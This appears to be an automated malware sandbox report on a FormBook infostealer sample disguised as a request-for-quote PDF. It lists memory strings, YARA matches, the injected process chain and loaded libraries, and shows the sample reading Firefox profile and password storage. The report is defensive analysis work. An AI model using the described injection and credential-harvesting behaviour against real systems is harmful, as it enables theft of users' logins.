            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuwuzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyuezhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiangcaozhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xianshangzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xinglianzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyuezhibo.net
            Source: 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xixiazhibo.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xunmeizhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yaomeizhibo.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yechuizhibo.com
            Source: 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yechunzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinhezhibo.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yiyingzhibo.net/binding
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yudiezhibo.net
            Source: 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueaizhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuechengzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueyingzhibo.net/binding
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuguozhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuhezhibo.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ziah.net
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004892000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000003E22000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004892000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000003E22000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000003E22000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004892000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000003E22000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://euob.seaskydvd.com/sxp/i/224f85302aa2b6ec30aac9a85da2cbf9.js
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mfpmp.exe, 00000003.00000003.2035771637.0000000007CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4182184058.0000000004D48000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4182184058.0000000004700000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000042D8000.00000004.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000003C90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: mfpmp.exe, 00000003.00000003.2042667545.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.000000000424A000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.00000000037DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004892000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000003E22000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: mfpmp.exe, 00000003.00000002.4182184058.0000000004BB6000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4183970541.00000000062D0000.00000004.00000800.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181739071.0000000004146000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1848742069.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849026159.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4180631001.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181549221.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4183518506.0000000005370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181501421.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849454850.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4181594224.00000000025A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000000.1709114830.0000000000894000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a839acff-7
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000000.1709114830.0000000000894000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a61a1b74-e
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b364d626-d
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_92acbfe2-6
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1720166154.0000000003A63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1719564522.0000000003C0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeFile created: C:\Users\user\AppData\Local\Temp\autCF91.tmpJump to behavior
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE stats (origin_domain VARCHAR NOT NULL, username_value VARCHAR(;
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.2036680006.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.2036568660.0000000002CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeReversingLabs: Detection: 44%
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeVirustotal: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe"
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe"
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfplat.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: powrprof.dllJump to behavior
